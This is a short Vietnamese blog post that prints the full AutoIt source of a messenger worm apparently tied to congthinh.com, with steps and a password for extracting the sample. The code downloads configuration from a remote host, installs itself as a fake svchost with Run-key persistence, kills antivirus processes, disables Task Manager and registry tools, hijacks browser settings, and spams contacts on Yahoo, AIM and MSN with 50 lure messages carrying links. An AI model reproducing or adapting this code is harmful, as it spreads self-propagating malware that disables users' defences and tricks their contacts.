code virut auto it của site congthinh.com
vẫn là autoit như mọi lần… nhưng lần này có thêm 1 số file mới
extract ra file .jpg đổi đuôi thành .zip và extract 1 lần nữa
pass: 123456
Các file extract ra:
apps.dat
inst.dat
mc.dat
pk.bin
rinst.exe
titles.dat
vinh.exe
Xinh.exe
Xinhhk.dll
code:
#NoTrayIcon
InetGet("http://congthinh.com/vinh.txt", @WindowsDir & "vinhauto.txt", 1, 0)
$FILE = FileOpen(@WindowsDir & "vinhauto.txt", 0)
$LINK = FileReadLine($FILE, 1)
$LINK2 = FileReadLine($FILE, 2)
$WEBSITE = FileReadLine($FILE, 3)
DirCreate(@WindowsDir & "systemsystem32")
FileCopy(@AutoItExe, @WindowsDir & "systemsystem32svchost32.exe")
FileDelete("C:Documents and Settings" & @UserName & "Cookies*.txt")
FileDelete(@WindowsDir & "systemsvchost.exe")
FileDelete(@WindowsDir & "systemsvchost32.exe")
FileDelete(@WindowsDir & "svchost32.exe")
FileDelete(@WindowsDir & "svchost.exe")
FileDelete(@WindowsDir & "updt.exe")
$VAR = DriveGetDrive("all")
FileDelete("" & $VAR & "auto.exe")
RegDelete("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun", "SVCHOST")
If ProcessExists("Bkav2006.exe") Then
ProcessClose("Bkav2006.exe")
EndIf
If ProcessExists("FastHelper.exe") Then
ProcessClose("FastHelper.exe")
EndIf
If ProcessExists("bdss.exe") Then
ProcessClose("bdss.exe")
ProcessClose("vsserv.exe")
EndIf
RegWrite("HKEY_CURRENT_USERSoftwarePoliciesMicrosoftInternet ExplorerControl Panel", "Homepage", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableTaskMgr", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem", "DisableRegistryTools", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoRun", "REG_DWORD", "1")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftInternet ExplorerMain", "Start Page", "REG_SZ", $WEBSITE)
RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerViewYMSGR_buzz", "content url", "REG_SZ", $WEBSITE)
RegWrite("HKEY_CURRENT_USERSoftwareYahoopagerViewYMSGR_Launchcast", "content url", "REG_SZ", $WEBSITE)
RegWrite("HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun", "Task Manager", "REG_SZ", @WindowsDir & "systemsystem32svchost32.exe")
RegWrite("HKEY_CURRENT_USERSoftwareGoogleGoogleToolbarNotifier", "KeepDS", "REG_DWORD", "0")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftSearch Assistant", "DefaultSearchURL", "REG_SZ", "http://congthinh.com/?search=")
RegWrite("HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer", "NoRun", "REG_DWORD", "1")
Dim $TIN[50]
$TIN[0] = "Twenty-five dollars is to much to pay for that shirt : " & $LINK & "shirt.jpg "
$TIN[1] = "I earn as much money as my website " & $LINK & " "
$TIN[2] = "People belive that we wanted men is living near you " & $LINK & "wanted.jpg be careful !!! "
$TIN[3] = "People allege that he stole 100000 Dollars : " & $LINK & "hisimages.jpg "
$TIN[4] = "I look radian in my new dress : " & $LINK & "newdress.jpg :x :x "
$TIN[5] = "What a interesting film !!! " & $LINK & "film.wmv It's the most interesting film i've ever seen "
$TIN[6] = ":)) My family was elated by the news . I won an iPhone. You will never believe it :O " & $LINK & "mylottery.jpg "
$TIN[7] = "This is my one-off Xmase-card for you ^_^ " & $LINK & "?id=ecard Very nice !!! =)) "
$TIN[8] = "you are virus infected . Use this tool to remove viruses from your PC : " & $LINK & "?id=virus_shield "
$TIN[9] = "Microsoft to release 2007 free-of-charge packs of Windows Vista for its first 2007 online registered users: " & $LINK & "?id=vista "
$TIN[10] = "Breaking news : Osama Bin Laden has been arrested !! : " & $LINK & "?id=news "
$TIN[11] = "My new personal website: " & $LINK & " c0ol !!! "
$TIN[12] = "OMG !!! Google was hacked : " & $LINK & "?id=google "
$TIN[13] = ":D who is beside you in this pic " & $LINK2 & "friendpic.gif so good-looking "
$TIN[14] = ";) 1 of my vacation pictures " & $LINK2 & "vacation.gif < :-P "
$TIN[15] = "hot pics this week " & $LINK2 & "hot.gif :x cool !!! "
$TIN[16] = ";) 1 of my vacation pictures " & $LINK2 & "vacation.gif <:-P "
$TIN[17] = "Screenshot of my new Ipod " & $LINK2 & "ipod.gif so cool :D "
$TIN[18] = "never click into the links like something in this image " & $LINK2 & "dontclick.gif #:-S !!! "
$TIN[19] = "Images shot in Viet Nam _ The war will never end " & $LINK2 & "VietNamWar.gif << :( "
$TIN[20] = ":( the page cannot be displayed " & $LINK2 & "error.gif Something was wrong !!! Check it again and tell me later. THanks !!!"
$TIN[21] = "My pics with my new lover " & $LINK2 & "mypics.gif :x b-( "
$TIN[22] = "New game ;;) sexy beach 3 (man only) " & $LINK2 & "MissWorld.gif Ha Ha Ha!! "
$TIN[23] = "Do you realize who is in this image: " & $LINK2 & "who.gif . Just think for a moment and tell me soon ;))"
$TIN[24] = "damn it , she is so cute :x : " & $LINK2 & "girlcute.gif ... who is she ... do you know she ?"
$TIN[25] = "Be careful. There'll be earthquake tonight !!! : " & $LINK2 & "ghost.gif "
$TIN[26] = "I made 50 gifts for the first 50 people post comments on my own page : " & $LINK2 & " "
$TIN[27] = "My new personal website: : " & $LINK2 & " so c00l !!! "
$TIN[28] = "Yahoo to charge fee for its YM service : " & $LINK2 & "?id=yahoo !!! "
$TIN[29] = "OMG ! She is really beautiful :x " & $LINK2 & "DSC017473.GIF !!! "
$TIN[30] = "Download free MP3s " & $LINK2 & " "
$TIN[31] = "A new dangerous computer virus that can destroys all your data has just been released . Click here to know how to avoid it : : " & $LINK2 & "?id=pc_protector ."
$TIN[32] = "You are Yahoo Winner .... Click Here to get a FREE SMART PHONE : " & $LINK2 & "?id=yahoowinner ."
$TIN[33] = "Big, Beautiful & Single?Join a community for big beautiful women and those who admire them : " & $LINK2 & "girlcute.gif ."
$TIN[34] = "oh my god , FREE KOHLS $500 GIFT CARD! Warning: Offer is EXTREMELY limited! Get Yours Now! : " & $LINK2 & "?id=get ."
$TIN[35] = "Congratulations!You have been selected to receive a FREE* wireless MotoQ™ 9h smartphone .Click here to see " & $LINK2 & "?id=MotoQ™ ."
$TIN[36] = "You're a YAHOO winner!A Free Laptop for You.Click check it out " & $LINK2 & "?id=yahoowinner ."
$TIN[37] = "Free Hot Sex Movies " & $LINK2 & "hotsex.wmv ."
$TIN[38] = "Kho Anh Avatar Dep Co Tai " & $LINK2 & "avatar.php ."
$TIN[39] = "Nhung Hinh Anh Hot Nhat Co Tai: " & $LINK2 & "hot.jpg ."
$TIN[40] = "Hoa Hau Hoan Vu 2008 Co Tai: " & $LINK2 & "hoahau.jpg ."
$TIN[41] = "Nhung Tin Tuc Moi Nhat Co Tai: " & $LINK2 & "news.php ."
$TIN[42] = "Em xinh qua,Toan nhung em mac bikini nong bong , hap dan , nhin ma them :P " & $LINK2 & "bikini.php ."
$TIN[43] = "1 thang o tren mang kiem 2000$ , tai sao ban khong thu? " & $LINK2 & "kiemtien.php ."
$TIN[44] = "Tai sao anh? cua ban. lai. co' o? day ne` " & $LINK2 & "webcam.jpg ."
$TIN[45] = "Vao day de bau chon cho Hoa Hau VN " & $LINK2 & "bauchon.php ."
$TIN[46] = "Website moi' lam` , vao` tham quan ti' di " & $LINK2 & " ."
$TIN[47] = "CLUB Tuoi? TEEN " & $LINK2 & "teen.php ."
$TIN[48] = " Anh? moi' cua? Thuy TOP (Qua? boom tan^ VN) " & $LINK2 & "thuytop.gif ."
$TIN[49] = " Paris Hilton chup anh? NUDE ne , nguoi` dep the) " & $LINK2 & "paris.jpg ."
While (1)
Sleep(30000)
$TIEUDE0 = WinGetTitle("My Computer", "")
$KIEMTRA0 = WinExists($TIEUDE0)
$TIEUDE0X = WinGetTitle("Windows Explorer", "")
$KIEMTRA0X = WinExists($TIEUDE0X)
$TIEUDE1 = WinGetTitle("Yahoo! Messenger", "")
$KIEMTRA1 = WinExists($TIEUDE1)
$TIEUDE2 = WinGetTitle("AIM", "")
$KIEMTRA2 = WinExists($TIEUDE2)
$TIEUDE3 = WinGetTitle("Windows Live Messenger", "")
$KIEMTRA3 = WinExists($TIEUDE3)
$TIEUDE4 = WinGetTitle("Windows Messenger", "")
$KIEMTRA4 = WinExists($TIEUDE4)
$TIEUDE5 = WinGetTitle("Yahoo!7 Messenger", "")
$KIEMTRA5 = WinExists($TIEUDE5)
If $KIEMTRA0 = 1 Then
ClipPut($WEBSITE)
BlockInput(1)
WinActivate($TIEUDE0)
Send("{F6}")
Send("^v {ENTER}")
BlockInput(0)
EndIf
If $KIEMTRA0X = 1 Then
ClipPut($WEBSITE)
BlockInput(1)
WinActivate($TIEUDE0X)
Send("{F6}")
Send("^v {ENTER}")
BlockInput(0)
EndIf
If $KIEMTRA1 = 1 Then
$NGAUNHIEN = Random(0, 49, 1)
ClipPut($TIN[$NGAUNHIEN])
BlockInput(1)
WinActivate($TIEUDE1)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v")
Send("!s")
BlockInput(0)
EndIf
If $KIEMTRA2 = 1 Then
$NGAUNHIEN = Random(0, 49, 1)
ClipPut($TIN[$NGAUNHIEN])
BlockInput(1)
WinActivate($TIEUDE2)
Send("{HOME}")
Send("{DOWN}")
Send("^{SHIFTDOWN}{PGDN}{SHIFTUP}")
Send("{ENTER}")
Send("^v {ENTER}")
Send("!{F4}")
Send("!{F4}")
BlockInput(0)
EndIf
If $KIEMTRA3 = 1 Then
$NGAUNHIEN = Random(0, 49, 1)
ClipPut($TIN[$NGAUNHIEN])
BlockInput(1)
WinActivate($TIEUDE3)
Send("{ALT}")
Send("a")
Send("{ENTER}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{DOWN}")
Send("{SPACE}")
Send("{ENTER}")
Send("^v {ENTER}")
Send("!{F4}")
BlockInput(0)
EndIf
If $KIEMTRA4 = 1 Then
$NGAUNHIEN = Random(0, 49, 1)
ClipPut($TIN[$NGAUNHIEN])
BlockInput(1)
WinActivate($TIEUDE4)
Send("{ALT}")
Send("a")
Send("{ENTER}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{ENTER}")
Send("^v {ENTER}")
Send("!{F4}")
Send("{ALT}")
Send("a")
Send("{ENTER}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{ENTER}")
Send("^v {ENTER}")
Send("!{F4}")
Send("{ALT}")
Send("a")
Send("{ENTER}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{ENTER}")
Send("^v {ENTER}")
Send("!{F4}")
Send("{ALT}")
Send("a")
Send("{ENTER}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{ENTER}")
Send("^v {ENTER}")
Send("!{F4}")
Send("{ALT}")
Send("a")
Send("{ENTER}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{ENTER}")
Send("^v {ENTER}")
Send("!{F4}")
Send("{ALT}")
Send("a")
Send("{ENTER}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{DOWN}")
Send("{ENTER}")
Send("^v {ENTER}")
Send("!{F4}")
BlockInput(0)
EndIf
If $KIEMTRA5 = 1 Then
$NGAUNHIEN = Random(0, 49, 1)
ClipPut($TIN[$NGAUNHIEN])
BlockInput(1)
WinActivate($TIEUDE5)
Send("!m")
Send("un")
Send("^v {ENTER}{ENTER}")
Send("^m")
Send("{DOWN}")
Send("^{SHIFTDOWN}{END}{SHIFTUP}")
Send("{ENTER}")
Send("^v")
Send("!s")
BlockInput(0)
EndIf
Sleep(900000)
WEndArticle Categories:
Virut/Trojan
